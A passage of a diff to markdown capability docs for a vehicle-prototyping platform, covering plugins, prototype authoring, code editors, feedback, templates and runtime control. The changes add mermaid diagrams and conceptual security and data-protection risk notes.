+Add an addon tab → it renders via `PluginPageRender`; reorder/hide → persists; configure Staging right-nav button → appears.
+
+```mermaid
+sequenceDiagram
+    participant O as Model owner
+    participant M as model.custom_template
+    participant P as PluginPageRender
+    O->>M: WRITE_MODEL + ALLOW_NON_ADMIN_ADDON_CONFIG
+    M->>P: model_tabs / prototype_tabs
+    M->>P: prototype_sidebar_plugin
+    M->>P: prototype_right_nav_buttons
+    P-->>O: renders plugin (unsandboxed)
+```
+
+### Security
+
+`WRITE_MODEL` + addon flag. Plugins unsandboxed.
+
+**Risks:**
+- **Malicious tab injection:** a non-admin bypassing `ALLOW_NON_ADMIN_ADDON_CONFIG` could inject a hostile plugin tab into every visitor's view, running arbitrary unsandboxed code (XSS / token theft) across the whole model audience.
+- **Sidebar/right-nav persistence:** sidebar and right-nav buttons are always-visible surfaces; a malicious plugin placed there executes on every model open, not just when a tab is activated.
+- **Supply-chain via referenced plugin IDs:** tab config references plugin IDs/slugs; if a referenced plugin is later compromised, the layout becomes a dormant delivery channel for malicious code.
+
+### Data protection
+
+Tab/layout config on the model document.
+
+**Risks:**
+- **Untrusted-code distribution channel:** the tab layout is a persisted delivery channel — a malicious layout keeps steering visitors toward running untrusted plugins until it is noticed and removed.
+- **Layout as metadata leak:** `custom_template` reveals which plugins and staging stages a model relies on, exposing internal architecture to anyone with read access.
 
 ## My Plugins & admin Plugin management
 
-- **Description:** Per-user plugin list (`/me/plugins`) + create/edit/delete; admin management (`/admin/plugins`) with four sections (Prototype Plugin, Deployment Plugin, Vehicle API Schema, Vehicle API/custom sets); configure deploy plugins per staging stage.
-- **Who uses it / value:** Plugin authors (manage own plugins); admins (manage all + custom APIs).
-- **Acceptance criteria:**
-  - `/me/plugins` (auth; shown to non-admins only when `ALLOW_NON_ADMIN_ADDON_CONFIG`) → CRUD own plugins.
-  - `/admin/plugins` (`MANAGE_USERS`) → 4 sections; custom API sections hidden when `DISABLE_CUSTOM_API_SETS`.
-- **Quality control:** Author creates a plugin via `/me/plugins` → usable as an addon; admin configures a deploy plugin per staging stage → it launches from Staging.
-- **Security:** My Plugins auth; admin `MANAGE_USERS`; non-admin visibility gated by addon flag.
-- **Data protection:** Plugin records + per-stage config (`STAGING_FRAME` site config holds stage → plugin mapping).
+### Description
+
+Per-user plugin list (`/me/plugins`) + create/edit/delete; admin management (`/admin/plugins`) with four sections (Prototype Plugin, Deployment Plugin, Vehicle API Schema, Vehicle API/custom sets); configure deploy plugins per staging stage.
+
+### Who uses it / value
+
+Plugin authors (manage own plugins); admins (manage all + custom APIs).
+
+### Acceptance criteria
+
+- `/me/plugins` (auth; shown to non-admins only when `ALLOW_NON_ADMIN_ADDON_CONFIG`) → CRUD own plugins.
+- `/admin/plugins` (`MANAGE_USERS`) → 4 sections; custom API sections hidden when `DISABLE_CUSTOM_API_SETS`.
+
+### Quality control
+
+Author creates a plugin via `/me/plugins` → usable as an addon; admin configures a deploy plugin per staging stage → it launches from Staging.
+
+```mermaid
+flowchart TD
+    A([Author]) -->|"/me/plugins (auth + addon flag)"| Me["CRUD own plugins"]
+    Ad([Admin]) -->|"/admin/plugins (MANAGE_USERS)"| Adm["4 sections"]
+    Adm --> S1["Prototype Plugin"]
+    Adm --> S2["Deployment Plugin"]
+    Adm --> S3["Vehicle API Schema"]
+    Adm --> S4["Vehicle API / custom sets"]
+    S4 -.->|hidden if DISABLE_CUSTOM_API_SETS| Hid["hidden"]
+    Ad --> Stage["Per-stage deploy plugin mapping"]
+    Stage --> SF["STAGING_FRAME site config"]
+```
+
+### Security
+
+My Plugins auth; admin `MANAGE_USERS`; non-admin visibility gated by addon flag.
+
+**Risks:**
+- **Flag misconfiguration widens authoring:** if `ALLOW_NON_ADMIN_ADDON_CONFIG` defaults to true, any authenticated user can author and publish plugins, enlarging the supply-chain attack surface.
+- **Admin plugin takeover:** a stolen `MANAGE_USERS` session lets an attacker reconfigure or replace any plugin (including deploy plugins that run during staging), turning admin actions into platform-wide compromise.
+- **Deploy-plugin execution context:** deploy plugins configured per staging stage run in the staging/deploy pipeline; a malicious deploy plugin can interfere with deployments or exfiltrate build artifacts.
+
+### Data protection
+
+Plugin records + per-stage config (`STAGING_FRAME` site config holds stage → plugin mapping).
+
+**Risks:**
+- **Stage-to-plugin mapping exposure:** the `STAGING_FRAME` mapping reveals deployment topology (which stages run which plugins); an attacker can target the weakest plugin or stage for disruption.
+- **Custom API set persistence:** Vehicle API/custom set records persist admin-defined API shapes; a malicious or compromised admin can silently alter API contracts that downstream consumers depend on.

--- a/docs/capabilities/prototypes-code.md
+++ b/docs/capabilities/prototypes-code.md
@@ -2,94 +2,405 @@
 
 Authoring and structuring a model's prototypes. Backend: `routes/v2/vehicle-data/prototype.route.js`, `models/prototype.model.js`. Frontend: `pages/{PagePrototypeLibrary,PagePrototypeDetail}.tsx`, `layouts/NewPrototypeLayout.tsx`.
 
+```mermaid
+flowchart TD
+    subgraph Authoring
+        L["Library / portfolio<br/>(list · portfolio · search)"] --> C["Create / import ZIP"]
+        C --> NP["New prototype layout<br/>(shell preview)"]
+        C --> CRUD["Prototype CRUD / bulk / recent / popular"]
+        CRUD --> WS["Workspace tabs<br/>(view · journey · code · dashboard · feedback · staging · plug)"]
+        WS --> CE["Code editor<br/>(Monaco · auto-save · GenAI)"]
+        WS --> PE["Project editor (multi-file)"]
+        WS --> FB["Prototype feedback"]
+        PT["Project templates"] -.->|scaffold starter| C
+    end
+    DB[("prototypes collection")]
+    C --> DB
+    CRUD --> DB
+    CE -->|auto-save code| DB
+    PE -->|project JSON in code| DB
+    FB --> DB
+    style DB fill:#fef3c7
+```
+
 ---
 
 ## Prototype library
 
-- **Description:** List/portfolio views of a model's prototypes; search, sort (Newest/Oldest/Name/Rating/Last/First viewed), filter; create a prototype (inline dialog, or the `/new-prototype` page when `ENABLE_NEW_PROTOTYPE_PAGE`); import from ZIP.
-- **Who uses it / value:** Model owners/contributors (manage prototypes); end users (browse/portfolio).
-- **Acceptance criteria:**
-  - Routes `/model/:id/library[/:tab(list|portfolio)[/:prototype_id]]` render the library.
-  - Create/import require `WRITE_MODEL`; viewing subject to `PUBLIC_VIEWING`.
-  - Duplicate-name detection offers suggestions.
-- **Quality control:** Create a prototype → appears in the list; switch list/portfolio; import a prototype ZIP → created; sort by name → ordered.
-- **Security:** Create/import `WRITE_MODEL`; reads respect `PUBLIC_VIEWING` + `READ_MODEL` for private models.
-- **Data protection:** Prototype metadata + code stored in `prototypes`; import reads archive contents.
+### Description
+
+List/portfolio views of a model's prototypes; search, sort (Newest/Oldest/Name/Rating/Last/First viewed), filter; create a prototype (inline dialog, or the `/new-prototype` page when `ENABLE_NEW_PROTOTYPE_PAGE`); import from ZIP.
+
+### Who uses it / value
+
+Model owners/contributors (manage prototypes); end users (browse/portfolio).
+
+### Acceptance criteria
+
+- Routes `/model/:id/library[/:tab(list|portfolio)[/:prototype_id]]` render the library.
+- Create/import require `WRITE_MODEL`; viewing subject to `PUBLIC_VIEWING`.
+- Duplicate-name detection offers suggestions.
+
+### Quality control
+
+Create a prototype → appears in the list; switch list/portfolio; import a prototype ZIP → created; sort by name → ordered.
+
+```mermaid
+flowchart LR
+    U([User]) -->|"GET /model/:id/library"| L{PUBLIC_VIEWING?}
+    L -->|true + anon| PUB["Public prototypes"]
+    L -->|false + anon| N["blocked"]
+    L -->|authed + READ_MODEL| ALL["My/Contributed/Public"]
+    U -->|"create / import .zip (WRITE_MODEL)"| C["Prototype created"]
+```
+
+### Security
+
+Create/import `WRITE_MODEL`; reads respect `PUBLIC_VIEWING` + `READ_MODEL` for private models.
+
+**Risks:**
+- **Private-prototype enumeration:** if server-side access scoping lags behind `PUBLIC_VIEWING`, a signed-out or cross-tenant user could enumerate private prototypes through list/portfolio filters, leaking proprietary SDV code.
+- **Malicious ZIP import:** import reads archive contents; an attacker-crafted archive could exploit path traversal or oversized payloads during extraction to corrupt storage or inject code.
+
+### Data protection
+
+Prototype metadata + code stored in `prototypes`; import reads archive contents.
+
+**Risks:**
+- **Source data loss on bad import:** a malformed or hostile ZIP could overwrite or shadow existing prototype code during import without a rollback path.
+- **Code exposure via visibility:** a prototype under a private model still stores full source code; a misapplied `PUBLIC_VIEWING` toggle exposes that code to anonymous users.
 
 ## New prototype layout
 
-- **Description:** Full-page create flow that previews the selected model's (or default template's) prototype shell — sidebar, tab bar, plugin preview — behind the create dialog, then navigates to the new prototype.
-- **Who uses it / value:** Model owners (a guided create experience).
-- **Acceptance criteria:**
-  - Route `/new-prototype` (auth; redirects to `/` if signed out); feature-flagged on by `ENABLE_NEW_PROTOTYPE_PAGE` (default `false`).
-  - Supports `?create-model` mode.
-- **Quality control:** With the flag on, open `/new-prototype` → shell preview + create dialog → navigates to the new prototype detail; signed-out → redirected to `/`.
-- **Security:** Auth required.
-- **Data protection:** No extra data; reads model/template to preview.
+### Description
+
+Full-page create flow that previews the selected model's (or default template's) prototype shell — sidebar, tab bar, plugin preview — behind the create dialog, then navigates to the new prototype.
+
+### Who uses it / value
+
+Model owners (a guided create experience).
+
+### Acceptance criteria
+
+- Route `/new-prototype` (auth; redirects to `/` if signed out); feature-flagged on by `ENABLE_NEW_PROTOTYPE_PAGE` (default `false`).
+- Supports `?create-model` mode.
+
+### Quality control
+
+With the flag on, open `/new-prototype` → shell preview + create dialog → navigates to the new prototype detail; signed-out → redirected to `/`.
+
+```mermaid
+sequenceDiagram
+    participant U as Owner
+    participant R as /new-prototype
+    participant T as Model/Template
+    U->>R: GET /new-prototype
+    R->>R: check auth (redirect / if signed out)
+    R->>T: load model/default template shell
+    T-->>R: sidebar · tab bar · plugin preview
+    R-->>U: shell preview + create dialog
+    U->>R: submit create
+    R->>R: create prototype (WRITE_MODEL)
+    R-->>U: navigate to prototype detail
+```
+
+### Security
+
+Auth required.
+
+**Risks:**
+- **Flag-bypass create:** if the `ENABLE_NEW_PROTOTYPE_PAGE` guard were bypassed or the underlying create endpoint didn't re-check `WRITE_MODEL`, an unauthenticated user reaching `/new-prototype` could open a model-scoped create flow.
+- **Template-driven code injection:** the shell preview loads a template's plugin config; a compromised template could render unsandboxed plugin code during creation.
+
+### Data protection
+
+No extra data; reads model/template to preview.
+
+**Risks:**
+- **Template data leakage:** previewing the default template exposes template layout/plugin references to any author; a misconfigured template could leak references to private plugins or internal assets.
 
 ## Prototype CRUD / bulk / recent / popular / execute-code
 
-- **Description:** Create/update/delete prototypes; bulk create; recent (cached per-user activity) and popular (top-executed, released, public) lists; execute-code counter.
-- **Who uses it / value:** Owners (lifecycle); end users (discover recent/popular); analytics (execution counts).
-- **Acceptance criteria:**
-  - `GET/POST /v2/prototypes` (read optional, write `WRITE_MODEL`); `POST /v2/prototypes/bulk` → `201`; `GET /v2/prototypes/recent` (auth) → `200`; `GET /v2/prototypes/popular` (optional) → `200`; `GET/PATCH/DELETE /v2/prototypes/:id` → `200`/`200`/`204`; `POST /v2/prototypes/:id/execute-code` → `200` increments counter.
-  - Private models require `READ_MODEL` for reads.
-- **Quality control:** Create → `201`; run code → execute counter increments; recent reflects your activity; popular shows released/public.
-- **Security:** Write `WRITE_MODEL`; recent requires auth; reads respect `PUBLIC_VIEWING` + model access.
-- **Data protection:** `last_viewed`, `executed_turns`, `rated_by` (Map), `state` stored per prototype.
+### Description
+
+Create/update/delete prototypes; bulk create; recent (cached per-user activity) and popular (top-executed, released, public) lists; execute-code counter.
+
+### Who uses it / value
+
+Owners (lifecycle); end users (discover recent/popular); analytics (execution counts).
+
+### Acceptance criteria
+
+- `GET/POST /v2/prototypes` (read optional, write `WRITE_MODEL`); `POST /v2/prototypes/bulk` → `201`; `GET /v2/prototypes/recent` (auth) → `200`; `GET /v2/prototypes/popular` (optional) → `200`; `GET/PATCH/DELETE /v2/prototypes/:id` → `200`/`200`/`204`; `POST /v2/prototypes/:id/execute-code` → `200` increments counter.
+- Private models require `READ_MODEL` for reads.
+
+### Quality control
+
+Create → `201`; run code → execute counter increments; recent reflects your activity; popular shows released/public.
+
+```mermaid
+flowchart TD
+    U([User]) -->|"GET /v2/prototypes"| L["list (read optional)"]
+    U -->|"POST /v2/prototypes (WRITE_MODEL)"| C["create → 201"]
+    U -->|"POST /v2/prototypes/bulk"| B["bulk create → 201"]
+    U -->|"GET /v2/prototypes/recent (auth)"| R["recent (per-user cache)"]
+    U -->|"GET /v2/prototypes/popular"| P["popular (released/public)"]
+    U -->|"POST /v2/prototypes/:id/execute-code"| X["increment executed_turns → 200"]
+    U -->|"PATCH/DELETE /v2/prototypes/:id"| CRUD["update → 200 / delete → 204"]
+```
+
+### Security
+
+Write `WRITE_MODEL`; recent requires auth; reads respect `PUBLIC_VIEWING` + model access.
+
+**Risks:**
+- **Bulk-create abuse:** `POST /v2/prototypes/bulk` without rate limiting lets an attacker spawn many prototypes, exhausting storage and polluting the model namespace.
+- **Counter inflation:** `execute-code` is unauthenticated relative to popularity ranking; an attacker could inflate `executed_turns` to manipulate the popular list.
+- **Cross-tenant read:** if `READ_MODEL` isn't enforced for private models on `GET /v2/prototypes/:id`, a user could read private prototype code by ID.
+
+### Data protection
+
+`last_viewed`, `executed_turns`, `rated_by` (Map), `state` stored per prototype.
+
+**Risks:**
+- **Activity profiling:** `last_viewed` and recent lists are per-user activity trails; a compromised account exposes which prototypes a user touched and when.
+- **Irreversible delete:** `DELETE /v2/prototypes/:id` hard-removes the prototype (no soft-delete), so accidental or malicious deletion is permanent source-data loss.
 
 ## Prototype workspace (tabs)
 
-- **Description:** The prototype detail page with built-in tabs plus custom plugin (addon) tabs and configurable right-nav action buttons; records `last_viewed` and recent-prototype.
-- **Who uses it / value:** Authors (build); reviewers (feedback); operators (staging); end users (view).
-- **Acceptance criteria:**
-  - Routes `/model/:id/library/prototype/:pid[/:tab]` with tabs `view|journey|code|dashboard|feedback|staging|plug`.
-  - Addon/tab management requires `WRITE_MODEL` + `ALLOW_NON_ADMIN_ADDON_CONFIG`; "Save as Template" requires admin; Staging requires auth + prototype code.
-  - Plugin sidebar collapsible; addon add/manage + "Customize Layout" editor available.
-- **Quality control:** Switch each tab → correct content renders; add an addon tab → it loads via `PluginPageRender`; reorder tabs → persists; Staging hidden for a code-less prototype.
-- **Security:** Tab management `WRITE_MODEL` + addon flag; Staging auth-gated. Plugins unsandboxed.
-- **Data protection:** Tab config + `extend` (plugin data sink) stored on the prototype; `last_viewed` updated on visit.
+### Description
+
+The prototype detail page with built-in tabs plus custom plugin (addon) tabs and configurable right-nav action buttons; records `last_viewed` and recent-prototype.
+
+### Who uses it / value
+
+Authors (build); reviewers (feedback); operators (staging); end users (view).
+
+### Acceptance criteria
+
+- Routes `/model/:id/library/prototype/:pid[/:tab]` with tabs `view|journey|code|dashboard|feedback|staging|plug`.
+- Addon/tab management requires `WRITE_MODEL` + `ALLOW_NON_ADMIN_ADDON_CONFIG`; "Save as Template" requires admin; Staging requires auth + prototype code.
+- Plugin sidebar collapsible; addon add/manage + "Customize Layout" editor available.
+
+### Quality control
+
+Switch each tab → correct content renders; add an addon tab → it loads via `PluginPageRender`; reorder tabs → persists; Staging hidden for a code-less prototype.
+
+```mermaid
+flowchart TD
+    V([Visitor]) -->|"GET /model/:id/library/prototype/:pid/:tab"| WS["Workspace shell"]
+    WS --> Tabs["view · journey · code · dashboard · feedback · staging · plug"]
+    Tabs -->|addon tab| PR["PluginPageRender (unsandboxed)"]
+    O([Owner]) -->|"addon add/manage (WRITE_MODEL + ALLOW_NON_ADMIN_ADDON_CONFIG)"| CFG["tab config + right-nav"]
+    CFG -->|persist| P["prototype.extend / tab config"]
+    O -->|"Save as Template (admin)"| MT["Model Template"]
+```
+
+### Security
+
+Tab management `WRITE_MODEL` + addon flag; Staging auth-gated. Plugins unsandboxed.
+
+**Risks:**
+- **Malicious addon tab:** plugins run unsandboxed via `PluginPageRender`; if the `ALLOW_NON_ADMIN_ADDON_CONFIG` gate were bypassed, a non-admin could inject a hostile tab into every visitor's view (XSS / token theft).
+- **Staging bypass:** Staging requires auth + prototype code; a missing check could expose staging execution to anonymous users or code-less prototypes.
+
+### Data protection
+
+Tab config + `extend` (plugin data sink) stored on the prototype; `last_viewed` updated on visit.
+
+**Risks:**
+- **Plugin data sink persistence:** `extend` stores arbitrary plugin-supplied data on the prototype; a malicious plugin could persist hostile payloads that re-activate on every visit.
+- **View-tracking exposure:** `last_viewed` updates on every visit, creating a fine-grained viewing log tied to the visitor's session.
 
 ## Code editor
 
-- **Description:** Monaco editor with auto-save; resizable Vehicle API panel; SDV ProtoPilot GenAI launcher; code diff view; language label; multi-file Project Editor when code is a JSON project.
-- **Who uses it / value:** Prototype authors (write/edit SDV code); GenAI users (generate code).
-- **Acceptance criteria:**
-  - Edit requires `WRITE_MODEL`; API panel shown when `SHOW_CODE_API_PANEL=true`; SDV ProtoPilot button shown when `SHOW_SDV_PROTOPILOT_BUTTON=true` + `USE_GEN_AI`; diff when `SHOW_CODE_DIFF=true`.
-  - Auto-save persists code; language label reflects Python/Rust.
-- **Quality control:** Edit code → auto-saves; open API panel → signals list; run ProtoPilot → generated code preview → apply; toggle diff → shows changes.
-- **Security:** Edit `WRITE_MODEL`; GenAI gated by `USE_GEN_AI` + flag.
-- **Data protection:** Code (potentially large text) stored in `prototype.code`; auto-save writes frequently (throttled by `captureChange`).
+### Description
+
+Monaco editor with auto-save; resizable Vehicle API panel; SDV ProtoPilot GenAI launcher; code diff view; language label; multi-file Project Editor when code is a JSON project.
+
+### Who uses it / value
+
+Prototype authors (write/edit SDV code); GenAI users (generate code).
+
+### Acceptance criteria
+
+- Edit requires `WRITE_MODEL`; API panel shown when `SHOW_CODE_API_PANEL=true`; SDV ProtoPilot button shown when `SHOW_SDV_PROTOPILOT_BUTTON=true` + `USE_GEN_AI`; diff when `SHOW_CODE_DIFF=true`.
+- Auto-save persists code; language label reflects Python/Rust.
+
+### Quality control
+
+Edit code → auto-saves; open API panel → signals list; run ProtoPilot → generated code preview → apply; toggle diff → shows changes.
+
+```mermaid
+sequenceDiagram
+    participant A as Author
+    participant E as Monaco editor
+    participant API as Vehicle API panel
+    participant AI as SDV ProtoPilot (USE_GEN_AI)
+    participant DB as prototype.code
+    A->>E: edit code (WRITE_MODEL)
+    E->>DB: auto-save (captureChange throttled)
+    A->>API: open panel (SHOW_CODE_API_PANEL)
+    API-->>A: signals list
+    A->>AI: launch (SHOW_SDV_PROTOPILOT_BUTTON + USE_GEN_AI)
+    AI-->>A: generated code preview
+    A->>E: apply
+    E->>DB: persist
+```
+
+### Security
+
+Edit `WRITE_MODEL`; GenAI gated by `USE_GEN_AI` + flag.
+
+**Risks:**
+- **GenAI prompt-injection:** generated code from ProtoPilot is applied to `prototype.code`; a malicious prompt could inject code that runs in staging or exfiltrates prototype data when later executed.
+- **Unauthed auto-save:** if the `WRITE_MODEL` check were skipped on the auto-save path, any viewer could overwrite an author's code with no version history to revert.
+
+### Data protection
+
+Code (potentially large text) stored in `prototype.code`; auto-save writes frequently (throttled by `captureChange`).
+
+**Risks:**
+- **Source data loss on autosave:** frequent auto-save with no history means a bad paste or GenAI apply can irreversibly overwrite the author's prior code with no recovery trail.
+- **Large-payload bloat:** unthrottled code growth could bloat the `prototypes` document, degrading backups and reads.
 
 ## Project editor (multi-file)
 
-- **Description:** File-tree editor with create/rename/delete files & folders, open tabs, unsaved-change tracking, save-all, import/export ZIP, per-file Monaco. Activated when prototype code is a JSON project descriptor.
-- **Who uses it / value:** Authors of multi-file SDV projects.
-- **Acceptance criteria:**
-  - Activated when `prototype.code` is a JSON project; edit requires `WRITE_MODEL`.
-  - File ops (create/rename/delete), tabs, save-all, import/export ZIP all functional.
-- **Quality control:** Add a file → appears in tree; edit + save-all → persisted; export ZIP → valid archive containing files.
-- **Security:** Edit `WRITE_MODEL`. GitHub auth wiring available for intended git sync (partial).
-- **Data protection:** Whole project stored as JSON in `prototype.code`; export contains all files.
+### Description
+
+File-tree editor with create/rename/delete files & folders, open tabs, unsaved-change tracking, save-all, import/export ZIP, per-file Monaco. Activated when prototype code is a JSON project descriptor.
+
+### Who uses it / value
+
+Authors of multi-file SDV projects.
+
+### Acceptance criteria
+
+- Activated when `prototype.code` is a JSON project; edit requires `WRITE_MODEL`.
+- File ops (create/rename/delete), tabs, save-all, import/export ZIP all functional.
+
+### Quality control
+
+Add a file → appears in tree; edit + save-all → persisted; export ZIP → valid archive containing files.
+
+```mermaid
+flowchart TD
+    A([Author]) -->|"activate when code = JSON project"| PE["Project editor"]
+    PE -->|create/rename/delete| T["File tree"]
+    PE -->|open tabs| Tabs["Per-file Monaco"]
+    PE -->|save-all (WRITE_MODEL)| DB["prototype.code (JSON)"]
+    PE -->|import .zip| ZI["parse archive → files"]
+    PE -->|export .zip| ZO["ZIP archive of all files"]
+```
+
+### Security
+
+Edit `WRITE_MODEL`. GitHub auth wiring available for intended git sync (partial).
+
+**Risks:**
+- **Path traversal in file ops:** create/rename/delete operate on paths inside the JSON project; without validation an attacker could craft `../` paths to escape the project root and overwrite unrelated files.
+- **ZIP import traversal:** importing a ZIP with malicious entry names (`../`) could write files outside the project tree if extraction doesn't sanitize paths.
+- **Partial git-sync exposure:** the partial GitHub auth wiring, if reachable, could leak credentials or push prototype code to an unintended remote.
+
+### Data protection
+
+Whole project stored as JSON in `prototype.code`; export contains all files.
+
+**Risks:**
+- **Bulk source loss:** a single destructive file delete or a corrupt save-all overwrites the entire project JSON; with no per-file history, the whole project can be lost at once.
+- **Export exfiltration:** export ZIP bundles every project file, so a leaked edit token lets an attacker steal the complete multi-file source in one action.
 
 ## Prototype feedback
 
-- **Description:** Star-rated feedback (need addressed / relevance / ease of use, 1–5, averaged) with description and interview metadata; add/delete own; pagination.
-- **Who uses it / value:** Reviewers (give feedback); owners (improve prototypes).
-- **Acceptance criteria:**
-  - `GET /v2/feedbacks` (optional auth) → `200` paginated; `POST` (auth) → `201`; `PATCH/DELETE /:id` → `200`/`204` (own feedback).
-  - UI tab `feedback` lists feedback, add via form, delete own only.
-- **Quality control:** Add feedback → appears with averaged score; delete another user's feedback → not allowed; pagination works.
-- **Security:** Add requires sign-in; delete limited to own.
-- **Data protection:** Feedback stores `interviewee` (name/organization), scores, `ref`/`model_id`; no secrets.
+### Description
+
+Star-rated feedback (need addressed / relevance / ease of use, 1–5, averaged) with description and interview metadata; add/delete own; pagination.
+
+### Who uses it / value
+
+Reviewers (give feedback); owners (improve prototypes).
+
+### Acceptance criteria
+
+- `GET /v2/feedbacks` (optional auth) → `200` paginated; `POST` (auth) → `201`; `PATCH/DELETE /:id` → `200`/`204` (own feedback).
+- UI tab `feedback` lists feedback, add via form, delete own only.
+
+### Quality control
+
+Add feedback → appears with averaged score; delete another user's feedback → not allowed; pagination works.
+
+```mermaid
+sequenceDiagram
+    participant R as Reviewer
+    participant API as /v2/feedbacks
+    participant DB as feedbacks
+    R->>API: GET /v2/feedbacks (optional auth)
+    API-->>R: 200 paginated
+    R->>API: POST (auth)
+    API->>DB: create feedback
+    API-->>R: 201
+    R->>API: PATCH/DELETE /:id
+    API->>API: verify own feedback
+    API->>DB: update/remove
+    API-->>R: 200 / 204
+```
+
+### Security
+
+Add requires sign-in; delete limited to own.
+
+**Risks:**
+- **Impersonated feedback:** if the own-only check on `PATCH/DELETE` is missing, a user could delete or alter others' feedback, manipulating a prototype's averaged scores.
+- **Anonymous spam:** `POST` only requires sign-in, so a burner account could flood feedback with biased ratings to inflate or tank a prototype's score.
+
+### Data protection
+
+Feedback stores `interviewee` (name/organization), scores, `ref`/`model_id`; no secrets.
+
+**Risks:**
+- **PII exposure:** `interviewee` name/organization is PII; a public `GET /v2/feedbacks` could expose reviewer and interviewee identities to anonymous users.
+- **Relationship inference:** feedback records tie a reviewer and interviewee to a specific prototype and model, leaking business relationships.
 
 ## Project templates
 
-- **Description:** Admin-managed scaffolds for starter projects (code + widget_config + customer_journey); predefined templates seeded on startup; case-insensitive unique name.
-- **Who uses it / value:** Admins (standardize starters); authors (quick-start).
-- **Acceptance criteria:**
-  - `GET /v2/project-template[/:id]` (public) → list/get; `POST` → `201` (admin); `PUT/DELETE /:id` → `200`/`204` (admin). Also at `/v2/system/project-template`.
-  - Seeded via `predefinedProjectTemplates.js` (never overwriting admin edits).
-- **Quality control:** Admin creates a template → selectable when creating a prototype; pick it → project pre-populated.
-- **Security:** Read public; write `MANAGE_USERS`.
-- **Data protection:** Template data (code/widget_config/journey) stored; no secrets.
+### Description
+
+Admin-managed scaffolds for starter projects (code + widget_config + customer_journey); predefined templates seeded on startup; case-insensitive unique name.
+
+### Who uses it / value
+
+Admins (standardize starters); authors (quick-start).
+
+### Acceptance criteria
+
+- `GET /v2/project-template[/:id]` (public) → list/get; `POST` → `201` (admin); `PUT/DELETE /:id` → `200`/`204` (admin). Also at `/v2/system/project-template`.
+- Seeded via `predefinedProjectTemplates.js` (never overwriting admin edits).
+
+### Quality control
+
+Admin creates a template → selectable when creating a prototype; pick it → project pre-populated.
+
+```mermaid
+flowchart LR
+    A([Admin]) -->|"POST/PUT/DELETE (MANAGE_USERS)"| T["project-template"]
+    S(["Startup seed"]) -->|"predefinedProjectTemplates.js"| T
+    T -->|"never overwrite admin edits"| T
+    C([Author]) -->|"new prototype from template"| P["prototype.code (project JSON)"]
+    T -.->|code + widget_config + journey| P
+```
+
+### Security
+
+Read public; write `MANAGE_USERS`.
+
+**Risks:**
+- **Platform-wide payload:** templates apply to every prototype created from them. A compromised admin could seed a template embedding hostile code, pushing it to all new projects.
+- **Seed-supply chain:** the predefined seed (`predefinedProjectTemplates.js`) runs at startup; a compromised seed file silently seeds malicious starter code into every deployment.
+
+### Data protection
+
+Template data (code/widget_config/journey) stored; no secrets.
+
+**Risks:**
+- **Persistent distribution channel:** a malicious template propagates its code, widget config, and journey to all derived prototypes until an admin notices and removes it.
+- **Starter-code IP leakage:** templates are public-read; any proprietary starter code placed in a template is exposed to anonymous users.

--- a/docs/capabilities/runtime-hardware-kits.md
+++ b/docs/capabilities/runtime-hardware-kits.md
@@ -2,69 +2,267 @@
 
 Executing prototype code on cloud/hardware runtimes. The frontend connects **directly** to the runtime/kit server; the backend reverse-proxies and issues asset tokens. Frontend: `components/molecules/{DaRuntimeControl,DaRuntimeConnector}.tsx`, `stores/runtimeStore.ts`. Backend: `app.js` (kit proxy), `controllers/asset.controller.js` (generateToken).
 
+```mermaid
+flowchart TD
+    subgraph Frontend
+        A["Runtime control panel<br/>(connect · run · stop · watch)"] -->|Socket.IO| RT
+        M["Runtime / asset manager<br/>(create · share · select)"] --> A
+        H["Hardware kit manager<br/>(identity · VSS · signals)"] --> A
+    end
+    subgraph Backend
+        T["POST /v2/assets/:id/generate-token<br/>(asset-scoped JWT)"] --> A
+        P["/kit-server/* proxy<br/>(KIT_SERVER_URL)"] -.->|same-origin| RT
+        S["Site config<br/>RUNTIME_SERVER_URL<br/>RUNTIME_SERVER_CONFIG"] --> A
+    end
+    RT["Runtime / Kit server"] -->|run_python_app / run_rust_app| OUT["Terminal · signals · vars"]
+    OUT --> A
+    style RT fill:#fef3c7
+    style T fill:#fef3c7
+```
+
 ---
 
 ## Runtime control panel
 
-- **Description:** Right-side panel on Code/Dashboard tabs: select/connect a runtime (cloud or hardware kit), Run/Stop, terminal output, signals watch, vars watch (C++), mock services, runtime usage, request pip install, rebuild/revert vehicle model, custom runtime URL, Rust remote compile; notifies widget iframes of run/stop.
-- **Who uses it / value:** Prototype authors (run/test code); hardware-kit operators.
-- **Acceptance criteria:**
-  - Connect to a runtime → `subscribe_apis` over Socket.IO → signals/vars stream into the UI; Run → `run_python_app`/`run_rust_app`; Stop → `stop_python_app`; terminal + trace vars update.
-  - Server URL from `RUNTIME_SERVER_URL`, options from `RUNTIME_SERVER_CONFIG`; custom runtime URL overrides (localStorage).
-  - Read requires `READ_MODEL`.
-- **Quality control:** Connect a cloud runtime → Run a Python prototype → terminal shows output + signals update; Stop → execution halts; pip install → dependency fetched; rebuild vehicle model → kit rebuilds.
-- **Security:** Read `READ_MODEL`. Direct Socket.IO to external kit server (auth via asset token). Rust remote compile sends code to a remote compiler.
-- **Data protection:** Runtime signal values are transient (`runtimeStore`); prototype code sent to the kit/remote compiler for execution.
+### Description
+
+Right-side panel on Code/Dashboard tabs: select/connect a runtime (cloud or hardware kit), Run/Stop, terminal output, signals watch, vars watch (C++), mock services, runtime usage, request pip install, rebuild/revert vehicle model, custom runtime URL, Rust remote compile; notifies widget iframes of run/stop.
+
+### Who uses it / value
+
+Prototype authors (run/test code); hardware-kit operators.
+
+### Acceptance criteria
+
+- Connect to a runtime → `subscribe_apis` over Socket.IO → signals/vars stream into the UI; Run → `run_python_app`/`run_rust_app`; Stop → `stop_python_app`; terminal + trace vars update.
+- Server URL from `RUNTIME_SERVER_URL`, options from `RUNTIME_SERVER_CONFIG`; custom runtime URL overrides (localStorage).
+- Read requires `READ_MODEL`.
+
+### Quality control
+
+Connect a cloud runtime → Run a Python prototype → terminal shows output + signals update; Stop → execution halts; pip install → dependency fetched; rebuild vehicle model → kit rebuilds.
+
+```mermaid
+sequenceDiagram
+    participant U as Author
+    participant P as Control panel
+    participant RT as Runtime/Kit server
+    U->>P: connect runtime
+    P->>RT: Socket.IO subscribe_apis
+    RT-->>P: signals/vars stream
+    U->>P: Run
+    P->>RT: run_python_app / run_rust_app
+    RT-->>P: terminal output + trace vars
+    U->>P: Stop
+    P->>RT: stop_python_app
+    RT-->>P: execution halted
+    P-->>U: notify widget iframes (run/stop)
+```
+
+### Security
+
+Read `READ_MODEL`. Direct Socket.IO to external kit server (auth via asset token). Rust remote compile sends code to a remote compiler.
+
+**Risks:**
